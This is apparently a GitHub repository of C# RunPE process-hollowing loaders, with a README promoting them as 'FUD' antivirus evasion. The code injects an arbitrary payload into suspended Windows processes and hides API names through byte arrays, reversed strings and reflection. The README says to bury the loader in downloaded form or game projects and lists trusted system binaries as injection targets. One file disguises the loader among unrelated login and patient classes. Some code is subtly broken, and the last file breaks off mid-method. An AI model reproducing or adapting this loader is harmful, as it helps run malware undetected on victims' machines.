├── All Bypass AV For My Best Runpe.cs ├── README.md ├── Runpe.cs ├── Runpe2.cs └── Stub.cs /All Bypass AV For My Best Runpe.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.Runtime.InteropServices; 4 | using System.Text; 5 | using System.Windows.Forms; 6 | using Microsoft.VisualBasic; // Install-Package Microsoft.VisualBasic 7 | using Microsoft.VisualBasic.CompilerServices; // Install-Package Microsoft.VisualBasic 8 | 9 | 10 | public partial class RegisterScreen : Form 11 | { 12 | bool adYazdiMi = false; 13 | bool soyadYazdiMi = false; 14 | bool kullaniciAdiYazdiMi = false; 15 | bool sifreYazdiMi = false; 16 | LoginScreen loginScreen; 17 | public RegisterScreen(LoginScreen loginScreen) 18 | { 19 | this.loginScreen = loginScreen; 20 | InitializeComponent(); 21 | } 22 | 23 | private void InitializeComponent() 24 | { 25 | throw new NotImplementedException(); 26 | } 27 | 28 | public class Kullanici 29 | { 30 | public Kullanici(int kullaniciId, string kullaniciAdi, string sifre, byte yetki) 31 | { 32 | this.kullaniciId = kullaniciId; 33 | this.kullaniciAdi = kullaniciAdi; 34 | this.sifre = sifre; 35 | this.yetki = yetki; 36 | } 37 | 38 | private int kullaniciId; 39 | private string kullaniciAdi; 40 | private string sifre; 41 | private byte yetki; 42 | private int sexxx; 43 | 44 | public int KullaniciID 45 | { 46 | get 47 | { 48 | return kullaniciId; 49 | } 50 | set 51 | { 52 | kullaniciId = value; 53 | } 54 | } 55 | 56 | public string KullaniciAdi 57 | { 58 | get 59 | { 60 | return kullaniciAdi; 61 | } 62 | set 63 | { 64 | kullaniciAdi = value; 65 | } 66 | } 67 | 68 | public string Sifre 69 | { 70 | get 71 | { 72 | return sifre; 73 | } 74 | set 75 | { 76 | sifre = value; 77 | } 78 | } 79 | 80 | public byte Yetki 81 | { 82 | get 83 | { 84 | return yetki; 85 | } 86 | set 87 | { 88 | yetki = value; 89 | } 90 | } 91 | } 92 | } 93 | 94 | public class LoginScreen 95 | { 96 | 
} 97 | 98 | namespace yarak 99 | { 100 | public static class klass 101 | { 102 | private static string kernel32 = BytesToStr(new byte[] { 107, 101, 114, 110, 101, 108, 51, 50 }); 103 | private static string LoadLibraryA = BytesToStr(new byte[] { 76, 111, 97, 100, 76, 105, 98, 114, 97, 114, 121, 65 }); 104 | 105 | private delegate IntPtr LoadLibraryAParameters(string name); 106 | 107 | private static readonly LoadLibraryAParameters LoadLibrary = CreateApi(kernel32, LoadLibraryA); 108 | 109 | private static DelegateInstance CreateApi(string name, string method) 110 | { 111 | return (DelegateInstance)(object)Marshal.GetDelegateForFunctionPointer((IntPtr)GetProcAddress((long)GetInternalModuleBaseAddr(name), method), typeof(DelegateInstance)); 112 | } 113 | 114 | private static IntPtr GetInternalModuleBaseAddr(string ModuleName) 115 | { 116 | if (ModuleName.Contains(".dll") == false) 117 | ModuleName = ModuleName + ".dll"; 118 | IntPtr ModuleBaseAddress = default; 119 | foreach (ProcessModule ProcessModule in Process.GetCurrentProcess().Modules) 120 | { 121 | if ((ProcessModule.ModuleName.ToLower() ?? "") == (ModuleName ?? 
"")) 122 | return ProcessModule.BaseAddress; 123 | } 124 | 125 | return LoadLibrary(ModuleName); 126 | } 127 | 128 | private static byte[] ReadByteArray(IntPtr Address, int Size) 129 | { 130 | var ReturnArray = new byte[Size]; 131 | Marshal.Copy(Address, ReturnArray, 0, Size); 132 | return ReturnArray; 133 | } 134 | 135 | private static long GetProcAddress(long ModuleAddress, string Export) 136 | { 137 | byte[] IExportDir = null; 138 | if (IntPtr.Size == 4) 139 | IExportDir = ReadByteArray((IntPtr)(ModuleAddress + Marshal.ReadInt32((IntPtr)(ModuleAddress + Marshal.ReadInt32((IntPtr)(ModuleAddress + 0x3CL)) + 0x78L)) + 24L), 16); 140 | if (IntPtr.Size == 8) 141 | IExportDir = ReadByteArray((IntPtr)(ModuleAddress + Marshal.ReadInt32((IntPtr)(ModuleAddress + Marshal.ReadInt32((IntPtr)(ModuleAddress + 0x3CL)) + 0x88L)) + 24L), 16); 142 | for (int i = 0, loopTo = BitConverter.ToInt32(IExportDir, 0); i <= loopTo; i += 1) 143 | { 144 | int tpAddress = Marshal.ReadInt32((IntPtr)(BitConverter.ToInt32(IExportDir, 8) + ModuleAddress + i * 4)); 145 | string ApiString = Encoding.ASCII.GetString(ReadByteArray((IntPtr)(ModuleAddress + tpAddress), 64)).Split(Convert.ToChar(Constants.vbNullChar))[0]; 146 | int Ord = BitConverter.ToInt16(ReadByteArray((IntPtr)(BitConverter.ToInt32(IExportDir, 12) + ModuleAddress + i * 2), 2), 0); 147 | if ((ApiString ?? "") == (Export ?? 
"")) 148 | return BitConverter.ToInt32(ReadByteArray((IntPtr)(BitConverter.ToInt32(IExportDir, 4) + ModuleAddress + Ord * 4), 4), 0) + ModuleAddress; 149 | } 150 | 151 | return default; 152 | } 153 | 154 | private delegate bool CP(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref STARTUP_INFORMATION startupInfo, ref PROCESS_INFORMATION processInformation); 155 | 156 | private delegate bool GTC(IntPtr thread, int[] context); 157 | 158 | private delegate bool W64GTC(IntPtr thread, int[] context); 159 | 160 | private delegate bool STC(IntPtr thread, int[] context); 161 | 162 | private delegate bool W64STC(IntPtr thread, int[] context); 163 | 164 | private delegate bool RPM(IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead); 165 | 166 | private delegate bool WPM(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten); 167 | 168 | private delegate int NTU(IntPtr process, int baseAddress); 169 | 170 | private delegate int VAE(IntPtr handle, int address, int length, int type, int protect); 171 | 172 | private delegate int RT(IntPtr handle); 173 | 174 | [StructLayout(LayoutKind.Sequential, Pack = 1)] 175 | private partial struct PROCESS_INFORMATION 176 | { 177 | public IntPtr ProcessHandle; 178 | public IntPtr ThreadHandle; 179 | public uint ProcessId; 180 | public uint ThreadId; 181 | } 182 | 183 | [StructLayout(LayoutKind.Sequential, Pack = 1)] 184 | private partial struct STARTUP_INFORMATION 185 | { 186 | public uint Size; 187 | public string Reserved1; 188 | public string Desktop; 189 | public string Title; 190 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 36)] 191 | public byte[] Misc; 192 | public IntPtr Reserved2; 193 | public IntPtr StdInput; 194 | public IntPtr StdOutput; 195 | public IntPtr StdError; 196 | } 197 | 198 | private static bool HandleRun(string path, 
string cmd, byte[] data, bool compatible) 199 | { 200 | 201 | // Step 3 202 | // We retrieve the name of the API we are going to have to call, this method was used for bypass some AV some years ago 203 | string K32 = BytesToStr(new byte[] { 107, 101, 114, 110, 101, 108, 51, 50, 46, 100, 108, 108 }); // Kernel32.dll 204 | string NTD = BytesToStr(new byte[] { 110, 116, 100, 108, 108, 46, 100, 108, 108 }); // Ntdll.dll 205 | string CP = BytesToStr(new byte[] { 67, 114, 101, 97, 116, 101, 80, 114, 111, 99, 101, 115, 115, 65 }); // CreateProcess 206 | string GTC = BytesToStr(new byte[] { 71, 101, 116, 84, 104, 114, 101, 97, 100, 67, 111, 110, 116, 101, 120, 116 }); // GetThreadContext 207 | string STC = BytesToStr(new byte[] { 83, 101, 116, 84, 104, 114, 101, 97, 100, 67, 111, 110, 116, 101, 120, 116 }); // SetThreadContext 208 | string W64GTC = BytesToStr(new byte[] { 87, 111, 119, 54, 52, 71, 101, 116, 84, 104, 114, 101, 97, 100, 67, 111, 110, 116, 101, 120, 116 }); // Wow64GetThreadContext 209 | string W64STC = BytesToStr(new byte[] { 87, 111, 119, 54, 52, 83, 101, 116, 84, 104, 114, 101, 97, 100, 67, 111, 110, 116, 101, 120, 116 }); // Wow64SetThreadContext 210 | string RPM = BytesToStr(new byte[] { 82, 101, 97, 100, 80, 114, 111, 99, 101, 115, 115, 77, 101, 109, 111, 114, 121 }); // .... 
211 | string WPM = BytesToStr(new byte[] { 87, 114, 105, 116, 101, 80, 114, 111, 99, 101, 115, 115, 77, 101, 109, 111, 114, 121 }); 212 | string NTU = BytesToStr(new byte[] { 78, 116, 85, 110, 109, 97, 112, 86, 105, 101, 119, 79, 102, 83, 101, 99, 116, 105, 111, 110 }); 213 | string VAE = BytesToStr(new byte[] { 86, 105, 114, 116, 117, 97, 108, 65, 108, 108, 111, 99, 69, 120 }); 214 | string RT = BytesToStr(new byte[] { 82, 101, 115, 117, 109, 101, 84, 104, 114, 101, 97, 100 }); 215 | 216 | // Step 4 217 | // Here, the API are resolved at runtime by a custom GetProcAdress 218 | var CreateProcess = CreateApi(K32, CP); 219 | var GetThreadContext = CreateApi(K32, GTC); 220 | var Wow64GetThreadContext = CreateApi(K32, W64GTC); 221 | var SetThreadContext = CreateApi(K32, STC); 222 | var Wow64SetThreadContext = CreateApi(K32, W64STC); 223 | var ReadProcessMemory = CreateApi(K32, RPM); 224 | var WriteProcessMemory = CreateApi(K32, WPM); 225 | var NtUnmapViewOfSection = CreateApi(NTD, NTU); 226 | var VirtualAllocEx = CreateApi(K32, VAE); 227 | var ResumeThread = CreateApi(K32, RT); 228 | var ReadWrite = default(int); 229 | string QuotedPath = string.Format("\"{0}\"", path); 230 | var SI = new STARTUP_INFORMATION(); 231 | var PI = new PROCESS_INFORMATION(); 232 | SI.Size = (uint)Marshal.SizeOf(typeof(STARTUP_INFORMATION)); 233 | try 234 | { 235 | if (!string.IsNullOrEmpty(cmd)) 236 | { 237 | QuotedPath = QuotedPath + " " + cmd; 238 | } 239 | 240 | // Step 5 : we create a suspended process where the payload will be injected 241 | if (!CreateProcess(path, QuotedPath, IntPtr.Zero, IntPtr.Zero, false, 4U, IntPtr.Zero, null, ref SI, ref PI)) 242 | throw new Exception(); 243 | int FileAddress = BitConverter.ToInt32(data, 60); // We get the value of elf_new (used to find NtHeader) 244 | int ImageBase = BitConverter.ToInt32(data, FileAddress + 52); // We get the image base of our payload 245 | var Context = new int[179]; 246 | Context[0] = 65538; // Context FULL 247 | 248 | // Step 
6 : We check if our process is x86 or x64 249 | // Then we get the context of the Suspended Process created earlier 250 | if (IntPtr.Size == 4) 251 | { 252 | if (!GetThreadContext(PI.ThreadHandle, Context)) 253 | throw new Exception(); 254 | } 255 | else if (!Wow64GetThreadContext(PI.ThreadHandle, Context)) 256 | throw new Exception(); 257 | int Ebx = Context[41]; 258 | var BaseAddress = default(int); 259 | 260 | // Step 7 : We get the baseAdress of the Suspended Process by reading is memory at the Ebx + 8 261 | if (!ReadProcessMemory(PI.ProcessHandle, Ebx + 8, ref BaseAddress, 4, ref ReadWrite)) 262 | throw new Exception(); 263 | 264 | // Step 8 : If the ImageBase of our payload is the same as the Suspended Process we need to unmap it to map our payload 265 | if (ImageBase == BaseAddress) 266 | { 267 | if (!(NtUnmapViewOfSection(PI.ProcessHandle, BaseAddress) == 0)) 268 | throw new Exception(); 269 | } 270 | 271 | int SizeOfImage = BitConverter.ToInt32(data, FileAddress + 80); // Get the Size of our payload 272 | int SizeOfHeaders = BitConverter.ToInt32(data, FileAddress + 84); // Get the SizeHeader of our payload 273 | var AllowOverride = default(bool); 274 | 275 | // Step 9 : Create a buffer into the Suspended Process at the ImageBase of our payload 276 | int NewImageBase = VirtualAllocEx(PI.ProcessHandle, ImageBase, SizeOfImage, 12288, 64); 277 | 278 | // This is the only way to execute under certain conditions. However, it may show 279 | // an application error probably because things aren't being relocated properly. 
280 | if (!compatible && NewImageBase == 0) 281 | { 282 | AllowOverride = true; 283 | NewImageBase = VirtualAllocEx(PI.ProcessHandle, 0, SizeOfImage, 12288, 64); 284 | } 285 | 286 | if (NewImageBase == 0) 287 | throw new Exception(); 288 | 289 | // Step 10 : Now, we write the Header bytes of our payload in the region created in the Step 9 290 | if (!WriteProcessMemory(PI.ProcessHandle, NewImageBase, data, SizeOfHeaders, ref ReadWrite)) 291 | throw new Exception(); 292 | int SectionOffset = FileAddress + 248; // Get the address of Sections Header 293 | short NumberOfSections = BitConverter.ToInt16(data, FileAddress + 6); // Get the number of sections 294 | 295 | // Step 11 : We write all sections in the region created previously 296 | // After this, our payload is corectly mapped in the suspended process 297 | for (int I = 0, loopTo = NumberOfSections - 1; I <= loopTo; I++) 298 | { 299 | int VirtualAddress = BitConverter.ToInt32(data, SectionOffset + 12); 300 | int SizeOfRawData = BitConverter.ToInt32(data, SectionOffset + 16); 301 | int PointerToRawData = BitConverter.ToInt32(data, SectionOffset + 20); 302 | if (!(SizeOfRawData == 0)) 303 | { 304 | var SectionData = new byte[SizeOfRawData]; 305 | Buffer.BlockCopy(data, PointerToRawData, SectionData, 0, SectionData.Length); 306 | if (!WriteProcessMemory(PI.ProcessHandle, NewImageBase + VirtualAddress, SectionData, SectionData.Length, ref ReadWrite)) 307 | throw new Exception(); 308 | } 309 | 310 | SectionOffset += 40; 311 | } 312 | 313 | var PointerData = BitConverter.GetBytes(NewImageBase); 314 | // Step 12 : We overwrite the BaseAddress of the PEB by the new ImageBase of our payload 315 | if (!WriteProcessMemory(PI.ProcessHandle, Ebx + 8, PointerData, 4, ref ReadWrite)) 316 | throw new Exception(); 317 | int AddressOfEntryPoint = BitConverter.ToInt32(data, FileAddress + 40); 318 | if (AllowOverride) 319 | NewImageBase = ImageBase; 320 | 321 | // Step 13 : We update EAX by the entry Point of our payload 322 | 
Context[44] = NewImageBase + AddressOfEntryPoint; 323 | 324 | // Step 14 : Update the ContextThread 325 | if (IntPtr.Size == 4) 326 | { 327 | if (!SetThreadContext(PI.ThreadHandle, Context)) 328 | throw new Exception(); 329 | } 330 | else if (!Wow64SetThreadContext(PI.ThreadHandle, Context)) 331 | throw new Exception(); 332 | 333 | // Step 15 : Resume our suspended Process 334 | if (ResumeThread(PI.ThreadHandle) == -1) 335 | throw new Exception(); // spoted avast 336 | } 337 | catch 338 | { 339 | var P = Process.GetProcessById((int)PI.ProcessId); 340 | if (P is object) 341 | P.Kill(); 342 | return false; 343 | } 344 | 345 | return true; 346 | } 347 | 348 | public static bool Run(string path, string cmd, byte[] data, bool compatible) 349 | { 350 | for (int I = 1; I <= 5; I++) 351 | { 352 | if (HandleRun(path, cmd, data, compatible)) // Step 2 : We will try to run the RunPe 5 times in case of some error 353 | { 354 | } 355 | 356 | return true; 357 | } 358 | 359 | return false; 360 | } 361 | 362 | private static string BytesToStr(byte[] input) 363 | { 364 | return Encoding.Default.GetString(input); 365 | } 366 | } 367 | } 368 | 369 | 370 | public partial class TBLHastalar 371 | { 372 | public byte HastaID { get; set; } 373 | public string HastaAd { get; set; } 374 | public string HastaSoyad { get; set; } 375 | public string HastaTC { get; set; } 376 | public string HastaCinsiyet { get; set; } 377 | public string HastaDogumYeri { get; set; } 378 | public string HastaTelefon { get; set; } 379 | public string Poliklinik { get; set; } 380 | public string RandevuTarihi { get; set; } 381 | } 382 | 383 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Runpe-ProcessHollowing 2 | TR 3 | 4 | Fud Runpe Av Evasion 5 | 6 | Öncellikle Runpeyi Githubdan indirdiğimiz Otomasyon Form Game Tarzı Projelerin İçine Koyuyoruz 7 | 8 | daha Sora obfuscate 
Ettikten sora Undetected oluyor ondan sora kullanabilirsiniz 9 | 10 | Developer İntrusive 11 | ------------------- 12 | EN 13 | 14 | 15 | Fud Runpe Av Evasion 16 | 17 | First of all, we Put Runpey Into Automation Forms-Style Projects that we have downloaded from Github 18 | 19 | after you have obfuscated more Sora, you can use from it that sora is getting Undetected 20 | 21 | ------------------------------------------------------------- 22 | İnjection List Dotnet 23 | 24 | C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe 25 | 26 | C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe 27 | 28 | C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe 29 | 30 | C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe 31 | 32 | C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\CasPol.exe 33 | 34 | -------------------------------------------------------------------- 35 | İnjection List Native 36 | 37 | C:\\Windows\\System32\\svchost.exe 38 | 39 | C:\\Windows\\System32\\schtasks.exe 40 | 41 | C:\\Windows\\explorer.exe 42 | 43 | C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe 44 | 45 | ------------------------------------------------------------- 46 | -------------------------------------------------------------------------------- /Runpe.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.Runtime.InteropServices; 4 | using Microsoft.VisualBasic; 5 | 6 | namespace GIT 7 | { 8 | public class Kamikazi 9 | { 10 | public static Int16 ToInt16(byte[] value, int startIndex) 11 | { 12 | return (Int16)typeof(BitConverter).GetMethod("ToIn" + "t16").Invoke(null, new object[] { value, startIndex }); 13 | } 14 | public static Int32 ToInt32(byte[] value, int startIndex) 15 | { 16 | return (Int32)typeof(BitConverter).GetMethod("To" + "Int32").Invoke(null, new object[] { value, startIndex }); 17 | } 18 | public static byte[] GetBytes(int value) 
19 | { 20 | System.Reflection.MethodInfo[] mi = typeof(BitConverter).GetMethods(); 21 | byte[] Result = new byte[] { }; 22 | for (int i = 0; i < mi.Length; i++) 23 | { 24 | if (mi[i].Name == "Get" + "Bytes") 25 | { 26 | if (mi[i].GetParameters()[0].ParameterType.Name == "In" + "t32") 27 | { 28 | Result = (byte[])mi[i].Invoke(null, new object[] { value }); 29 | } 30 | } 31 | } 32 | return Result; 33 | } 34 | 35 | public static string[] ReturnParams() 36 | { 37 | string KJ = "23lenrek[||]lldtn[||]daerhTemuseR[||]txetnoCdaerhTteS46woW[||]txetnoCdaerhTteS[||]txetnoCdaerhTteG46woW[||]txetnoCdaerhTteG[||]xEcollAlautriV[||]yromeMssecorPetirW[||]yromeMssecorPdaeR[||]noitceSfOweiVpamnUwZ[||]AssecorPetaerC"; 38 | return KJ.Split(new string[] { "[||]" }, StringSplitOptions.None); 39 | } 40 | #region API delegate 41 | private delegate int ResumeThread_Delegate(IntPtr handle); 42 | private delegate bool Wow64SetThreadContext_Delegate(IntPtr thread, int[] context); 43 | private delegate bool SetThreadContext_Delegate(IntPtr thread, int[] context); 44 | private delegate bool Wow64GetThreadContext_Delegate(IntPtr thread, int[] context); 45 | private delegate bool GetThreadContext_Delegate(IntPtr thread, int[] context); 46 | private delegate int VirtualAllocEx_Delegate(IntPtr handle, int address, int length, int type, int protect); 47 | private delegate bool WriteProcessMemory_Delegate(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten); 48 | private delegate bool ReadProcessMemory_Delegate(IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead); 49 | private delegate int ZwUnmapViewOfSection_Delegate(IntPtr process, int baseAddress); 50 | private delegate bool CreateProcessA_Delegate(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, 51 | bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref StartupInformation startupInfo, ref 
ProcessInformation processInformation); 52 | #endregion 53 | 54 | #region API 55 | private static readonly ResumeThread_Delegate ResumeThread = LoadApi(Strings.StrReverse(ReturnParams()[0]), Strings.StrReverse(ReturnParams()[2])); 56 | private static readonly Wow64SetThreadContext_Delegate Wow64SetThreadContext = LoadApi(Strings.StrReverse(ReturnParams()[0]), Strings.StrReverse(ReturnParams()[3])); 57 | private static readonly SetThreadContext_Delegate SetThreadContext = LoadApi(Strings.StrReverse(ReturnParams()[0]), Strings.StrReverse(ReturnParams()[4])); 58 | private static readonly Wow64GetThreadContext_Delegate Wow64GetThreadContext = LoadApi(Strings.StrReverse(ReturnParams()[0]), Strings.StrReverse(ReturnParams()[5])); 59 | private static readonly GetThreadContext_Delegate GetThreadContext = LoadApi(Strings.StrReverse(ReturnParams()[0]), Strings.StrReverse(ReturnParams()[6])); 60 | private static readonly VirtualAllocEx_Delegate VirtualAllocEx = LoadApi(Strings.StrReverse(ReturnParams()[0]), Strings.StrReverse(ReturnParams()[7])); 61 | private static readonly WriteProcessMemory_Delegate WriteProcessMemory = LoadApi(Strings.StrReverse(ReturnParams()[0]), Strings.StrReverse(ReturnParams()[8])); 62 | private static readonly ReadProcessMemory_Delegate ReadProcessMemory = LoadApi(Strings.StrReverse(ReturnParams()[0]), Strings.StrReverse(ReturnParams()[9])); 63 | private static readonly ZwUnmapViewOfSection_Delegate ZwUnmapViewOfSection = LoadApi(Strings.StrReverse(ReturnParams()[1]), Strings.StrReverse(ReturnParams()[10])); 64 | private static readonly CreateProcessA_Delegate CreateProcessA = LoadApi(Strings.StrReverse(ReturnParams()[0]), Strings.StrReverse(ReturnParams()[11])); 65 | #endregion 66 | 67 | 68 | #region CreateAPI 69 | [DllImport("kernel32", SetLastError = true)] 70 | private static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string Name); 71 | [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = 
true)] 72 | private static extern IntPtr GetProcAddress(IntPtr hProcess, [MarshalAs(UnmanagedType.VBByRefStr)] ref string Name); 73 | private static CreateApi LoadApi(string name, string method) 74 | { 75 | return (CreateApi)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)); 76 | } 77 | #endregion 78 | 79 | 80 | #region Structure 81 | [StructLayout(LayoutKind.Sequential, Pack = 1)] 82 | private struct ProcessInformation 83 | { 84 | public readonly IntPtr ProcessHandle; 85 | public readonly IntPtr ThreadHandle; 86 | public readonly uint ProcessId; 87 | private readonly uint ThreadId; 88 | } 89 | [StructLayout(LayoutKind.Sequential, Pack = 1)] 90 | private struct StartupInformation 91 | { 92 | public uint Size; 93 | private readonly string Reserved1; 94 | private readonly string Desktop; 95 | private readonly string Title; 96 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 36)] private readonly byte[] Misc; 97 | private readonly IntPtr Reserved2; 98 | private readonly IntPtr StdInput; 99 | private readonly IntPtr StdOutput; 100 | private readonly IntPtr StdError; 101 | } 102 | #endregion 103 | 104 | public static void Execute(string path, byte[] payload) 105 | { 106 | for (int i = 0; i < 5; i++) 107 | { 108 | int readWrite = 0; 109 | StartupInformation SI = new StartupInformation(); 110 | ProcessInformation PI = new ProcessInformation(); 111 | SI.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(StartupInformation))); 112 | try 113 | { 114 | bool CPA = CreateProcessA(path, "", IntPtr.Zero, IntPtr.Zero, false, 4 | 134217728, IntPtr.Zero, null, ref SI, ref PI); 115 | if (!CPA) 116 | { 117 | throw new Exception(); 118 | } 119 | int fileAddress = ToInt32(payload, 30 + 30); 120 | int imageBase = ToInt32(payload, fileAddress + 50 + 2); 121 | int[] context = new int[170 + 9]; 122 | context[0] = 65538; 123 | if (IntPtr.Size == 4) 124 | { if (!GetThreadContext(PI.ThreadHandle, context)) throw new Exception(); } 
125 | else 126 | { if (!Wow64GetThreadContext(PI.ThreadHandle, context)) throw new Exception(); } 127 | int ebx = context[41]; 128 | int baseAddress = 0; 129 | if (!ReadProcessMemory(PI.ProcessHandle, ebx + 8, ref baseAddress, 4, ref readWrite)) throw new Exception(); 130 | if (imageBase == baseAddress) 131 | if (ZwUnmapViewOfSection(PI.ProcessHandle, baseAddress) != 0) throw new Exception(); 132 | int sizeOfImage = ToInt32(payload, fileAddress + 80); 133 | int sizeOfHeaders = ToInt32(payload, fileAddress + 84); 134 | bool allowOverride = false; 135 | int newImageBase = VirtualAllocEx(PI.ProcessHandle, imageBase, sizeOfImage, 12288, 64); 136 | 137 | if (newImageBase == 0) throw new Exception(); 138 | if (!WriteProcessMemory(PI.ProcessHandle, newImageBase, payload, sizeOfHeaders, ref readWrite)) throw new Exception(); 139 | int sectionOffset = fileAddress + 248; 140 | short numberOfSections = ToInt16(payload, fileAddress + 6); 141 | for (int I = 0; I < numberOfSections; I++) 142 | { 143 | int virtualAddress = (int)typeof(Kamikazi).GetMethod("ToInt32").Invoke(null, new object[] { payload, sectionOffset + 12 }); 144 | int sizeOfRawData = (int)typeof(Kamikazi).GetMethod("ToInt32").Invoke(null, new object[] { payload, sectionOffset + 16 }); 145 | int pointerToRawData = (int)typeof(Kamikazi).GetMethod("ToInt32").Invoke(null, new object[] { payload, sectionOffset + 20 }); 146 | if (sizeOfRawData != 0) 147 | { 148 | byte[] sectionData = new byte[sizeOfRawData]; 149 | typeof(Buffer).GetMethod("BlockCopy").Invoke(null, new object[] { payload, pointerToRawData, sectionData, 0, sectionData.Length }); 150 | if (!WriteProcessMemory(PI.ProcessHandle, newImageBase + virtualAddress, sectionData, sectionData.Length, ref readWrite)) throw new Exception(); 151 | } 152 | sectionOffset += 40; 153 | } 154 | byte[] pointerData = GetBytes(newImageBase); 155 | if (!WriteProcessMemory(PI.ProcessHandle, ebx + 8, pointerData, 4, ref readWrite)) throw new Exception(); 156 | int 
addressOfEntryPoint = ToInt32(payload, fileAddress + 40); 157 | if (allowOverride) newImageBase = imageBase; 158 | context[44] = newImageBase + addressOfEntryPoint; 159 | 160 | if (IntPtr.Size == 4) 161 | { 162 | if (!SetThreadContext(PI.ThreadHandle, context)) throw new Exception(); 163 | } 164 | else 165 | { 166 | if (!Wow64SetThreadContext(PI.ThreadHandle, context)) throw new Exception(); 167 | } 168 | if (ResumeThread(PI.ThreadHandle) == -1) throw new Exception(); 169 | } 170 | catch 171 | { 172 | Process.GetProcessById(Convert.ToInt32(PI.ProcessId)).Kill(); 173 | continue; 174 | } 175 | break; 176 | } 177 | } 178 | } 179 | } -------------------------------------------------------------------------------- /Runpe2.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | //Developer İntrusive 8 | //Developer İntrusive 9 | //Developer İntrusive 10 | //Developer İntrusive 11 | //Developer İntrusive 12 | 13 | namespace intrusive 14 | { 15 | public static class ömer 16 | { 17 | [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "CreateProcess", CharSet = System.Runtime.InteropServices.CharSet.Unicode)] 18 | [System.Security.SuppressUnmanagedCodeSecurity] 19 | private static extern bool CreateProcess_API(string applicationName, string commandLine, System.IntPtr processAttributes, System.IntPtr threadAttributes, bool inheritHandles, uint creationFlags, System.IntPtr environment, string currentDirectory, ref STARTUP_INFORMATION startupInfo, ref PROCESS_INFORMATION processInformation); 20 | [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "GetThreadContext")] 21 | [System.Security.SuppressUnmanagedCodeSecurity] 22 | private static extern bool GetThreadContext_API(System.IntPtr thread, int[] context); 23 | 
[System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "Wow64GetThreadContext")] 24 | [System.Security.SuppressUnmanagedCodeSecurity] 25 | private static extern bool Wow64GetThreadContext_API(System.IntPtr thread, int[] context); 26 | [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "SetThreadContext")] 27 | [System.Security.SuppressUnmanagedCodeSecurity] 28 | private static extern bool SetThreadContext_API(System.IntPtr thread, int[] context); 29 | [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "Wow64SetThreadContext")] 30 | [System.Security.SuppressUnmanagedCodeSecurity] 31 | private static extern bool Wow64SetThreadContext_API(System.IntPtr thread, int[] context); 32 | [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "ReadProcessMemory")] 33 | [System.Security.SuppressUnmanagedCodeSecurity] 34 | private static extern bool ReadProcessMemory_API(System.IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead); 35 | [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "WriteProcessMemory")] 36 | [System.Security.SuppressUnmanagedCodeSecurity] 37 | private static extern bool WriteProcessMemory_API(System.IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten); 38 | [System.Runtime.InteropServices.DllImport("ntdll.dll", EntryPoint = "UnmapViewOfSection")] 39 | [System.Security.SuppressUnmanagedCodeSecurity] 40 | private static extern int NtUnmapViewOfSection_API(System.IntPtr process, int baseAddress); 41 | [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "VirtualAllocEx")] 42 | [System.Security.SuppressUnmanagedCodeSecurity] 43 | private static extern int VirtualAllocEx_API(System.IntPtr handle, int address, int length, int type, int protect); 44 | [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "ResumeThread")] 45 | [System.Security.SuppressUnmanagedCodeSecurity] 46 
| private static extern int ResumeThread_API(System.IntPtr handle); 47 | [System.Runtime.InteropServices.StructLayout(System.Runtime.InteropServices.LayoutKind.Sequential, Pack = 1)] 48 | private struct PROCESS_INFORMATION 49 | { 50 | public System.IntPtr HasanHandle; 51 | public System.IntPtr TihradHandle; 52 | public uint _processıd; 53 | public uint _threadıd; 54 | } // PROCESS_INFORMATION 55 | 56 | [System.Runtime.InteropServices.StructLayout(System.Runtime.InteropServices.LayoutKind.Sequential, Pack = 1)] 57 | private struct STARTUP_INFORMATION 58 | { 59 | public uint Size_; 60 | public string _reversed1s_; 61 | public string _desktop_; 62 | public string _title_; 63 | 64 | public int dwX; 65 | public int dwY; 66 | public int dwXSize; 67 | public int dwYSize; 68 | public int dwXCountChars; 69 | public int dwYCountChars; 70 | public int dwFillAttribute; 71 | public int FLAGSS; 72 | public short wShowWindow; 73 | public short cbReserved2; 74 | public System.IntPtr Reserved2; 75 | public System.IntPtr StdInput; 76 | public System.IntPtr StdOutput; 77 | public System.IntPtr StdError; 78 | } 79 | 80 | public static bool Run(string path, string cmd, byte[] data, bool compatible) 81 | { 82 | for (int fri = 1; fri <= 5; fri++) 83 | { 84 | if 